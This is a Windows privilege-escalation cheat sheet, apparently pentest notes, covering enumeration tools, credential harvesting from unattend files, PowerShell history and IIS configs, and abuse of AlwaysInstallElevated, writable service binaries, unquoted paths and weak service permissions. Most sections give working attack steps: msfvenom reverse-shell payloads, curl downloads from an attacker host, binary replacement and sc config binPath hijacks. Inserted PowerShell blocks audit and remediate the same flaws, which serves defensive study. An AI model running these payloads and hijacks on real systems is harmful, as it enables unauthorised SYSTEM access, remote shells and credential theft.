Windows

A list of Privilege Escalation Techniques for Windows.

Local Privesc Scanner

winPEAS

winPEAS is a script that searches for possible paths to escalate privileges on Windows hosts.

Github: https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS

PrivescCheck

This script aims to enumerate common Windows configuration issues that can be leveraged for local privilege escalation. It also gathers various information that might be useful for exploitation and/or post-exploitation.

Github: https://github.com/itm4n/PrivescCheck

Windows Exploit Suggester - Next Generation (WES-NG)

WES-NG is a tool that takes the output of Windows' systeminfo utility and provides the list of vulnerabilities the OS is affected by, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 11, including their Windows Server counterparts, is supported.

Github: https://github.com/bitsadmin/wesng

Automatic privesc tools

PowerUp

PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

Running Invoke-AllChecks will output any identifiable vulnerabilities along with specifications for any abuse functions. The -HTMLReport flag will also generate a COMPUTER.username.html version of the report.

Github: PowerUp

⚠️ This tool is no longer supported

Sherlock

PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.

Github: Sherlock

⚠️ This tool is no longer supported

Watson

Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.

Github: Watson

⚠️ This tool is no longer supported

Impersonation

JuicyPotatoNG

Allows a Windows service account to escalate to NT AUTHORITY\SYSTEM when the SeImpersonate or SeAssignPrimaryToken privilege is enabled.

# Get a shell on the machine
.\JuicyPotatoNG.exe -t * -p "C:\windows\system32\cmd.exe" -i

Github: https://github.com/ohpe/juicy-potato

Harvesting passwords

Unattended windows installations

Unattended Windows installations require an administrator account to perform the initial setup; its credentials might end up stored on the machine in the following locations:

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

Credentials could be stored in these files.

Powershell history

From cmd:

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

From PowerShell:

type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Windows saved credentials

Use the following command to list the saved credentials:

cmdkey /list

If saved credentials are listed, you can start a new shell as that user:

runas /savecred /user:privileged_user cmd.exe

IIS configuration

You might find IIS configuration files in the following locations:

C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

You can search for "connectionString" to find some database credentials in the config file.

type web.config | findstr connectionString

PuTTY proxy credentials

To retrieve stored proxy credentials, search the following registry key for ProxyPassword with this command:

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Misconfigurations

Scheduled tasks

Look for a scheduled task that has either lost its binary or uses a binary you can modify.

List scheduled tasks:

schtasks

See the details of a task:

schtasks /query /tn vulnerable_task /fo list /v

The program executed by the task will be listed under "Task To Run:". If you can modify this binary, you can run code as the user running the task (listed under "Run as User:"). You can use icacls to check the file permissions.

C:\> icacls c:\tasks\schtask.bat
c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
                    BUILTIN\Administrators:(I)(F)
                    BUILTIN\Users:(I)(F)

In this example, the groups marked "(F)" have full access to the file. If you are in one of these groups, you can replace the file with your payload to execute the code you want; just keep the name used in the scheduled task.

Always Install Elevated

You need to check that two registry keys are set to know whether the machine is exploitable. You can check them with the following commands:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

If both are set, the machine is exploitable. Using msfvenom you can generate an MSI payload that will exploit the vulnerability.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attack_machine_ip> LPORT=9001 -f msi -o reverse_shell.msi

Then start a metasploit handler on your attack machine, setting the payload to the same one used with msfvenom. Then drop your payload on the vulnerable machine and execute it with the following command:

msiexec /quiet /qn /i <path_to_the_payload>
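The two reg query commands above only show the raw values; the policy is effective only when AlwaysInstallElevated is 1 in both hives. The following PowerShell is an added example, not part of the original page: it evaluates that condition in one step and includes the remediation (setting the value to 0, which corresponds to the Group Policy setting "Always install with elevated privileges" under Windows Components > Windows Installer being Disabled). The function names are my own.

```powershell
# Added audit check (not part of the original page): reports whether the
# AlwaysInstallElevated policy is active in BOTH hives, which is the condition
# that lets any user install an MSI as SYSTEM, and provides the remediation.
$InstallerPolicyKeys = @(
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Test-AlwaysInstallElevated {
    $result = foreach ($path in $InstallerPolicyKeys) {
        $value = $null
        if (Test-Path $path) {
            # The value is simply absent on a healthy host, so suppress the "not found" error.
            $value = (Get-ItemProperty -Path $path -Name AlwaysInstallElevated `
                        -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        [pscustomobject]@{
            Hive    = $path.Split(':')[0]
            Value   = $value
            Enabled = ($value -eq 1)
        }
    }
    $result | Format-Table -AutoSize | Out-String | Write-Host

    # Windows Installer only honours the policy when it is set in HKCU and HKLM.
    $vulnerable = @($result | Where-Object Enabled).Count -eq 2
    if ($vulnerable) {
        Write-Warning 'AlwaysInstallElevated is set in both hives: any user can install an MSI as SYSTEM.'
    } else {
        Write-Host 'AlwaysInstallElevated is not fully enabled.'
    }
    return $vulnerable
}

function Disable-AlwaysInstallElevated {
    # Remediation (requires administrative rights): force the value to 0 in both hives.
    # On domain-joined hosts enforce the same through Group Policy so it cannot drift back.
    foreach ($path in $InstallerPolicyKeys) {
        if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
        Set-ItemProperty -Path $path -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
}

Test-AlwaysInstallElevated
```

Run Test-AlwaysInstallElevated from any user context to audit; Disable-AlwaysInstallElevated needs an elevated prompt because it writes to HKLM.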

Insecure permissions on service executable

If the executable associated with a service has weak permissions that allow you to modify or replace it, you can trivially gain the privileges of the service's account.

First check the service's details to see which binary it uses and which account runs it:

sc qc <vulnerable_service>

⚠️ If you are in a PowerShell shell, use sc.exe, as sc is an alias for "Set-Content"

The "SERVICE_START_NAME" is the user that runs the service and the "BINARY_PATH_NAME" is the path of the binary run by the service. You can use icacls to check the file permissions.

C:\> icacls <vunerable_binary_path>
<vunerable_binary_path> Everyone:(I)(M)
                        NT AUTHORITY\SYSTEM:(I)(F)
                        BUILTIN\Administrators:(I)(F)
                        BUILTIN\Users:(I)(RX)
                        APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                        APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

In this example you can see that Everyone has the modify permission "(M)". You can replace the file with your payload to execute the code you want; just keep the path used in the service. Make sure that you generate a correct service binary; to do so you can use msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attack_machine_ip> LPORT=9001 -f exe-service -o reverse_shell_svc.exe

Then start a metasploit handler with the correct payload on your attacking machine, drop the payload on the vulnerable machine and replace the binary used by the service with your payload:

move <vunerable_binary_path> <vunerable_binary_path>.bak
curl http://<attacker_machine_ip>:8000/reverse_shell_svc.exe -o <vunerable_binary_path>

Then restart the service.

sc stop <vulnerable_service>
sc start <vulnerable_service>
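Both the scheduled-task case and the service-binary case above come down to the same check: does a low-privilege principal hold write-class rights on the executable (or, when the binary is missing, on the directory where it would be created)? The script below is an added example, not part of the original page; it does that check with built-in PowerShell across every service (Win32_Service) and every scheduled-task action instead of running icacls one file at a time. Everyone, BUILTIN\Users, Authenticated Users and INTERACTIVE are treated as low-privilege principals; the function names are my own. Run it from an elevated prompt so all tasks and services are visible.

```powershell
# Added audit script (not from the original page): reports task and service
# binaries whose file ACL grants write-class rights to low-privilege principals,
# and binaries that no longer exist (the "lost its binary" case).
$LowPrivPrincipals = @(
    'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
)
# Any of these rights lets the holder replace, alter or re-ACL the executable.
$WriteRights = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, TakeOwnership, ChangePermissions, Delete'

function Get-ExecutablePath {
    # Extract the executable from a command line such as
    #   "C:\Program Files\Svc\svc.exe" -k arg   or   C:\Svc\svc.exe -k arg
    param([string]$CommandLine)
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $expanded = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($expanded -match '^"?(?<exe>[^"]+?\.(exe|bat|cmd|ps1|vbs|js))"?') { return $Matches.exe }
    return $expanded.Split(' ')[0]
}

function Get-WeakAces {
    # Allow ACEs that give write-class rights to a low-privilege principal.
    param([string]$Path)
    (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        (([int]$_.FileSystemRights -band [int]$WriteRights) -ne 0) -and
        ($LowPrivPrincipals -contains $_.IdentityReference.Value)
    }
}

function Test-Binary {
    param([string]$Kind, [string]$Name, [string]$RunAs, [string]$CommandLine)
    $exe = Get-ExecutablePath $CommandLine
    # Bare names (e.g. "cmd.exe") are resolved through PATH; they are out of scope here.
    if (-not $exe -or -not [System.IO.Path]::IsPathRooted($exe)) { return }
    if (Test-Path -LiteralPath $exe) {
        $target  = $exe
        $finding = 'WeakAcl'
    } else {
        # Missing binary: whoever can create a file at this path runs as the task/service account.
        $target  = Split-Path -Parent $exe
        $finding = 'MissingBinary'
    }
    if (-not (Test-Path -LiteralPath $target)) { return }
    $weak = Get-WeakAces -Path $target
    if ($weak) {
        [pscustomobject]@{
            Kind     = $Kind
            Name     = $Name
            RunAs    = $RunAs
            Finding  = $finding
            Path     = $target
            WeakAces = ($weak | ForEach-Object { "$($_.IdentityReference): $($_.FileSystemRights)" }) -join '; '
        }
    }
}

$findings = @(
    # Services: Win32_Service exposes the command line (PathName) and the account (StartName).
    foreach ($svc in Get-CimInstance Win32_Service) {
        Test-Binary -Kind Service -Name $svc.Name -RunAs $svc.StartName -CommandLine $svc.PathName
    }
    # Scheduled tasks: a task can have several actions; only Execute actions carry a binary.
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            if ($action.Execute) {
                Test-Binary -Kind Task -Name "$($task.TaskPath)$($task.TaskName)" `
                            -RunAs $task.Principal.UserId -CommandLine $action.Execute
            }
        }
    }
)
$findings | Format-Table -AutoSize -Wrap
```

A WeakAcl finding on a binary run as SYSTEM or as a privileged account is what the two sections above exploit; the fix is to remove the offending ACE (icacls <path> /remove:g <principal>) or to move the binary under a directory with sane inherited permissions such as Program Files. A MissingBinary finding should be resolved by deleting or repairing the task or service rather than leaving a writable slot.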

Unquoted service paths

If the binary path used by a service is not quoted, Windows will split the path at each space and try to execute the resulting candidates in order.

Example: with BINARY_PATH_NAME : C:\foo bar\foo.exe, Windows will first try to execute C:\foo.exe and, if that fails, C:\foo bar\foo.exe. So if you have permission to create files in C:\ (and therefore to create C:\foo.exe), you can run code as the service's account. You can check this with icacls.
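The candidate list Windows walks through is fully determined by the unquoted path, so it can be computed for every service on the host. The script below is an added example, not part of the original page; it generalises the C:\foo bar\foo.exe case to all services, listing for each unquoted path the intermediate executables CreateProcess would try first (the files whose parent directories must not be writable by unprivileged users), and includes a remediation function that rewrites the ImagePath with quotes. The function names are my own.

```powershell
# Added audit/remediation script (not from the original page). Finds services
# whose ImagePath contains a space but is not quoted, shows the paths Windows
# would try before the intended binary, and can rewrite the path with quotes.
function Get-UnquotedServicePath {
    foreach ($svc in Get-CimInstance Win32_Service) {
        $p = $svc.PathName
        # Empty or already-quoted paths are safe; quoting makes the split unambiguous.
        if ([string]::IsNullOrWhiteSpace($p) -or $p.StartsWith('"')) { continue }
        # Separate the executable (up to the first .exe) from its arguments.
        if ($p -notmatch '^(?<exe>.+?\.exe)(?<args>\s.*)?$') { continue }
        $exe     = $Matches.exe
        $svcArgs = $Matches.args
        if (-not $exe.Contains(' ')) { continue }

        # Candidates CreateProcess tries, in order: the path cut at each space, plus ".exe".
        # For "C:\foo bar\foo.exe" this yields "C:\foo.exe".
        $parts = $exe.Split(' ')
        $candidates = for ($i = 1; $i -lt $parts.Count; $i++) {
            ($parts[0..($i - 1)] -join ' ') + '.exe'
        }
        [pscustomobject]@{
            Service    = $svc.Name
            RunAs      = $svc.StartName
            ImagePath  = $p
            Candidates = ($candidates -join ', ')
            Args       = $svcArgs
        }
    }
}

function Repair-UnquotedServicePath {
    # Rewrites ImagePath as "<exe>"<args>. Requires administrative rights.
    param([Parameter(Mandatory)][string]$ServiceName)
    $key     = "HKLM:\SYSTEM\CurrentControlSet\Services\$ServiceName"
    $current = (Get-ItemProperty -Path $key -Name ImagePath).ImagePath
    if (-not $current.StartsWith('"') -and $current -match '^(?<exe>.+?\.exe)(?<args>\s.*)?$') {
        $fixed = '"{0}"{1}' -f $Matches.exe, $Matches.args
        # ImagePath is REG_EXPAND_SZ, so keep that type when writing it back.
        Set-ItemProperty -Path $key -Name ImagePath -Value $fixed -Type ExpandString
        Write-Host "$ServiceName : $current -> $fixed"
    }
}

Get-UnquotedServicePath | Format-Table -AutoSize -Wrap
```

From cmd the same fix is sc config <service> binPath= "\"C:\foo bar\foo.exe\"" (the inner quotes escaped). Candidates whose parent directory is writable by unprivileged users are the ones to remediate first; by default C:\ allows authenticated users to create files, which is exactly why the C:\foo.exe example works.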

Make sure that you generate a correct service binary; to do so you can use msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attack_machine_ip> LPORT=9001 -f exe-service -o reverse_shell_svc.exe

Then start a metasploit handler with the correct payload on your attacking machine, drop the payload on the vulnerable machine and place it where the service will pick it up:

curl http://<attacker_machine_ip>:8000/reverse_shell_svc.exe -o C:\foo.exe

Then restart the service.

sc stop <vulnerable_service>
sc start <vulnerable_service>

Insecure service permissions

If you can modify a service's configuration, you can simply change the binary it runs to the path of your payload. To check whether you have the permissions to edit it, you can use accesschk:

C:\> accesschk64.exe -qlc <vulnerable_service>
  [0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SYSTEM
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_PAUSE_CONTINUE
        SERVICE_START
        SERVICE_STOP
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  [4] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Users
        SERVICE_ALL_ACCESS

Here we can see that the BUILTIN\Users group has the SERVICE_ALL_ACCESS permission, which means any user can reconfigure the service.
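accesschk is a Sysinternals download; the same information is available from the service's security descriptor via sc.exe sdshow. The script below is an added example, not part of the original page: it parses each service's SDDL with .NET's RawSecurityDescriptor and reports Allow ACEs that give Everyone, Authenticated Users, INTERACTIVE or BUILTIN\Users rights sufficient to reconfigure the service (SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER, or a generic-all/generic-write mask). The access-mask constants are the documented winsvc.h/winnt.h values; the function names are my own.

```powershell
# Added audit script (not from the original page): flags service DACL entries
# that let low-privilege principals reconfigure the service, the condition the
# accesschk output above shows for BUILTIN\Users with SERVICE_ALL_ACCESS.
$LowPrivSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'NT AUTHORITY\Authenticated Users'
    'S-1-5-4'      = 'NT AUTHORITY\INTERACTIVE'
    'S-1-5-32-545' = 'BUILTIN\Users'
}
# Access-mask bits (winsvc.h / winnt.h). SERVICE_ALL_ACCESS (0xF01FF) includes all of the
# service-specific bits, so it is caught by the SERVICE_CHANGE_CONFIG test.
$SERVICE_CHANGE_CONFIG = 0x00000002   # change binPath / obj / start type
$WRITE_DAC             = 0x00040000   # rewrite the DACL itself
$WRITE_OWNER           = 0x00080000   # take ownership, then rewrite the DACL
$GENERIC_WRITE         = 0x40000000
$GENERIC_ALL           = 0x10000000
$ReconfigureMask = $SERVICE_CHANGE_CONFIG -bor $GENERIC_WRITE -bor $GENERIC_ALL
$DangerousMask   = $ReconfigureMask -bor $WRITE_DAC -bor $WRITE_OWNER

function Get-WeakServiceAces {
    param([Parameter(Mandatory)][string]$ServiceName)
    # sc.exe sdshow prints a blank line followed by the SDDL string; failures print "[SC] ..." text.
    $sddl = (& sc.exe sdshow $ServiceName | Where-Object { $_ -match '^[DO]:' }) -join ''
    if (-not $sddl) { return }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor $sddl
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace.AceType -ne 'AccessAllowed') { continue }
        $sid = $ace.SecurityIdentifier.Value
        if (-not $LowPrivSids.ContainsKey($sid)) { continue }
        if (($ace.AccessMask -band $DangerousMask) -eq 0) { continue }
        [pscustomobject]@{
            Service        = $ServiceName
            Principal      = $LowPrivSids[$sid]
            AccessMask     = ('0x{0:X8}' -f $ace.AccessMask)
            CanReconfigure = (($ace.AccessMask -band $ReconfigureMask) -ne 0)
            CanRewriteDacl = (($ace.AccessMask -band ($WRITE_DAC -bor $WRITE_OWNER)) -ne 0)
        }
    }
}

$report = foreach ($svc in Get-Service) { Get-WeakServiceAces -ServiceName $svc.Name }
$report | Format-Table -AutoSize
```

A CanReconfigure hit is the misconfiguration this section exploits; CanRewriteDacl is equivalent in effect because the holder can grant themselves SERVICE_CHANGE_CONFIG. Remediate by setting a corrected descriptor with sc.exe sdset <service> <sddl> (the original SDDL with the offending ACE removed) or centrally through Group Policy under Computer Configuration > Windows Settings > Security Settings > System Services.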

Make sure that you generate a correct service binary; to do so you can use msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attack_machine_ip> LPORT=9001 -f exe-service -o reverse_shell_svc.exe

Then start a metasploit handler with the correct payload on your attacking machine and drop the payload on the vulnerable machine:

curl http://<attacker_machine_ip>:8000/reverse_shell_svc.exe -o C:\reverse_shell_svc.exe

Edit the service's configuration:

sc config <vulnerable_service> binPath= "C:\reverse_shell_svc.exe" obj= LocalSystem

The obj parameter is used to choose which account will run the service.

Then restart the service:

sc stop <vulnerable_service>
sc start <vulnerable_service>

Windows privileges

First run a terminal as administrator to enable all your privileges. Then check which privileges you have enabled:

whoami /priv

Then check the Priv2Admin repo to see what these privileges enable you to do.

Resources

PayloadsAllTheThings - Windows Privesc

dmcx' Red Team Notes 2.0 - Privesc

ired.team notes - privesc

Hacktricks - Windows privesc
